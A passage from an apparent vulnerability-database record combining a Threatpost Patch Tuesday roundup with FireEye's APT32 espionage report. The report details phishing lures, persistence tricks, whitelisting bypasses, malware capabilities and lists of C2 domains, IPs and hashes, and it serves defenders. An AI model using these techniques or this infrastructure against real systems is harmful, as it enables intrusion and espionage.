researchers.\n\n * ### Publicly Known .NET Core/Visual Studio Bug\n\nFor instance, the bug tracked as [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) exists in .NET Core and Visual Studio \u2013 it\u2019s the only critical-rated bug to be listed as publicly known.\n\n\u201cWithout more information from Microsoft, that\u2019s about all we know about it,\u201d said Dustin Childs, of Trend Micro\u2019s Zero Day Initiative, in [an analysis](<https://www.zerodayinitiative.com/blog/2021/2/9/the-february-2022-security-update-review>) released Tuesday. \u201cBased on the CVSS severity scale, this could allow remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.\u201d\n\n * ### **Windows Fax Bugs**\n\nOther critical bugs should be on researchers\u2019 radars. The bugs tracked as [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) meanwhile are both Windows Fax Service RCE problems.\n\n\u201cWindows Fax Service specifies settings for faxes, including how they are sent, received, viewed and printed,\u201d said Eric Feldman, senior product marketing manager at Automox. \u201cThe Windows Fax Service is used by the Windows Fax and Scan application included in all versions of Microsoft Windows 7, Windows 8 and Windows 10 and some earlier versions.\u201d\n\nAn attacker who successfully exploited either vulnerability could take control of an affected system, and then be able to install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cUsers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Feldman said. \u201cEven if you do not use Windows Fax and Scan, the Windows Fax Services is enabled by default.\u201d\n\n * ### **Critical TCP/IP Bugs**\n\n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) are both Windows TCP/IP RCE vulnerabilities. The former is found in the way Windows handles iPv4 source routing; the latter is found in the way Windows handles iPv6 packet reassembly.\n\n\u201cIPv4 source routing\u2026should be disabled by default,\u201d said Childs. \u201cYou can also block source routing at firewalls or other perimeter devices. The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.\u201d\n\nResearchers said that both these patches should be prioritized.\n\n\u201cBecause these affect the network stack, require zero interaction from a user and can be exploited by sending malicious network traffic to a device, it\u2019s only a matter of time before we see attackers leveraging these vulnerabilities to carry out cyberattacks,\u201d Chris Hass, director of information security and research at Automox, said.\n\nKevin Breen, director of cyber threat research at Immersive Labs, said that the IPv6 security hole is an obvious target for hackers.\n\n\u201cCVE-2021-24094 would be an obvious target because it affects a network stack, which typically operates with system level permissions and could therefore gain an attacker a system shell,\u201d he said. \u201cAs an IPV6 Link local attack it would require the threat actor to already have a foothold in your network, but could ultimately lead to a high level of access on domain controllers, for example. This vulnerability would be most dangerous to those who operate a flat network. Segmentation will help with mitigation.\u201d\n\nBreen also pointed out that RCE isn\u2019t the only possible outcome of an exploit for this bug.\n\n\u201cThe release notes indicate that the exploit is \u2018complex\u2019 \u2013 which means attempted attacks may serve to cause systems to crash, giving it the potential to be used in a denial-of-service attack,\u201d he said.\n\n * ### **Flaw in Windows Codec Pack**\n\nWindows Camera Codec Pack is home to yet another critical RCE bug ([CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>)). If successfully exploited, an attacker could run arbitrary code in the context of the current user.\n\n\u201cIf the current user is logged on with admin privileges, the attacker could gain control of the affected system,\u201d said Justin Knapp, senior product marketing manager at Automox. \u201cThis could enable an attacker to install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of the vulnerability requires the user to open a specially crafted file with an affected version of the codec pack. While there\u2019s no way to force a user to open the file, bad actors could manipulate a user through an email or web-based attack vector where the user is effectively convinced or enticed into opening the malicious file.\u201d\n\n * ### **Windows DNS Problems**\n\nAnd Windows Domain Name System (DNS) servers, when they fail to properly handle requests, are also open to a critical RCE bug ([CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>)) that could allow an attacker to run arbitrary code in the context of the Local System Account.\n\n\u201cOnly Windows servers that are configured as DNS servers are at risk of having this vulnerability exploited,\u201d Knapp said. \u201cTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to the Windows DNS server. Given the low level of attack complexity and \u2018exploitation more likely\u2019 label assigned, this is a vulnerability that should be addressed immediately.\u201d\n\n * ### **Windows Print Spooler**\n\nAlso of note, _[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>)_ affects the Windows Local Spooler, which is an important component within the Windows operating system that stores print jobs in memory until the printer is ready to accept them.\n\nIt\u2019s a bug that \u201ccould be a big concern,\u201d according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cThis vulnerability impacts Windows 7 to 10 and Windows Server 2008 to 2019,\u201d he said. \u201cWindows Print Spooler vulnerabilities have been widely exploited in the wild going back to the days of Stuxnet. Just last year CVE-2020-0986 was seen by Kaspersky being [widely exploited in the wild.](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>)\u201d\n\n * ### **Other Critical February 2021 Microsoft Bugs**\n\nAnd finally, .NET Core for Linux is also at risk for RCE ([CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>)); and [CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) is a critical RCE vulnerability in the Windows graphic component. Details are scant for both, but of the latter, Breen said, \u201cThis is the kind of vulnerability built into exploit kits and triggered by low level phishing campaigns targeting users en masse.\u201d\n\nAnd, a critical bug that would allow RCE exists in the Microsoft Windows Codecs Library ([CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>)). Details are sparse, but Microsoft said that the difficulty required for exploitation is considered to be low. However, end-user interaction is required for successful exploitation.\n\n### **Publicly Disclosed Bugs of Note**\n\nOutside of the critical issues, [CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) is a high-severity EoP vulnerability discovered to be impacting Sysinternals PsExec utility that deserves a look. It\u2019s listed as being publicly disclosed.\n\n\u201cPsExec which has been popular in the past for use in remote administration tasks such as patching remote systems, has also had a fair share of scrutiny due the utility\u2019s weaponization by criminals in malware,\u201d Nicholas Colyer, senior product marketing manager at Automox, said via email. \u201cProof-of-concept code has not been independently verified but it is notable that in January 2021, Microsoft released a patch to resolve a remote code-execution vulnerability for the same utility, indicating that it is getting attention. Robust endpoint management is necessary for any organization\u2019s continued success and it is advisable to consider alternatives in the modern era of software-as-a-service.\u201d\n\nThe other publicly reported vulnerabilities this month are [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), an EoP vulnerability in Windows Installer; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), a DoS vulnerability in the Windows Console Driver; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information-disclosure vulnerability in Windows DirectX; and [CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>), a .NET Core and Visual Studio DoS problem.\n\n## **Zerologon Redux**\n\nMicrosoft also again released the patch for the Netlogon vulnerability (CVE-2020-1472), which originally was resolved in August. The vulnerability has [consistently been exploited](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) by threat actors, so the re-release serves to highlight its importance. Microsoft also starting Tuesday [began blocking by default](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) any vulnerable connections on devices that could be used to exploit the flaw. It does this by enabling domain controller \u201cenforcement mode.\u201d\n\n\u201cWhen you consider that Zerologon led the U.S. government to issue an Emergency Directive to all federal agencies to promptly apply the patches for this vulnerability, you start to understand the gravity of the situation,\u201d Satnam Narang, staff research engineer at Tenable, told Threatpost. \u201cZerologon provides attackers a reliable way to move laterally once inside a network, giving them the ability to impersonate systems, alter passwords, and gain control over the proverbial keys to the kingdom via the domain controller itself.\u201d\n\nHe added, \u201cFor these reasons, Zerologon has been rolled into attacker playbooks, becoming a feather in the cap for post-compromise activity. We\u2019ve also seen reports of Zerologon being favored by ransomware groups like Ryuk during their campaigns.\u201d\n\n## **What Should IT Patch First?**\n\n\u201cWindows OS updates and [Adobe Acrobat and Reader](<https://threatpost.com/critical-adobe-windows-flaw/163789/>) need immediate attention with the list of exploited and publicly disclosed vulnerabilities,\u201d said Goettl.\n\nAfter that, development tools and IT tools \u201cneed some attention,\u201d he added.\n\n\u201c.Net Core and PsExec disclosures are a concern that should not go unaddressed. Because this development and IT tools do not follow the same update process as OS and application updates, it is important to review your DevOps processes and determine if you are able to detect and respond to updates for common dev components,\u201d he said. \u201cFor tools like PsExec it is important to understand your software inventory and where these tools are installed and ensure you can distribute updated versions as needed.\u201d\n\n**_Is your business an easy mark? _**_Save your spot for \u201c15 Cybersecurity Gaffes SMBs Make,\u201d **a **_**[_FREE Threatpost webinar_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>) **_**on Feb. 24 at 2 p.m. ET.** Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. __[Register here](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)__ for the Wed., Feb. 24 LIVE webinar. _\n", "modified": "2021-02-09T22:33:08", "published": "2021-02-09T22:33:08", "id": "THREATPOST:1502920D4F50B0D128077B515815C023", "href": "https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/", "type": "threatpost", "title": "Actively Exploited Windows Kernel Bug Allows Takeover", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-04-06T21:16:00", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-1732"], "description": "\n", "modified": "2021-04-06T07:00:00", "id": "MS:CVE-2021-1732", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732", "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T19:17:55", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7255"], "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7255", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-7255", "published": "2016-11-08T08:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-06-12T18:15:32", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| \n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "modified": "2017-05-14T18:00:00", "published": "2017-05-14T18:00:00", "id": "FIREEYE:8B4453AF3FA94076D63CCBDB94AFC782", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255"], "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * 